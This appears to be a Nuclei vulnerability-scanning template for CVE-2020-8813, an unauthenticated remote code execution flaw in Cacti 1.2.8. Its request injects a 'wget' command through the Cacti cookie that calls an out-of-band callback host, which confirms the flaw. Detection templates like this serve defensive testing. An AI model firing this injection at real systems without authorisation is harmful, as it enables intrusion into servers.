id: CVE-2020-8813 info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 severity: high description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability. reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - https://github.com/Cacti/cacti/releases - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129 - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8813 cwe-id: CWE-78 tags: cve,cve2020,cacti,rce,oast requests: - raw: - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"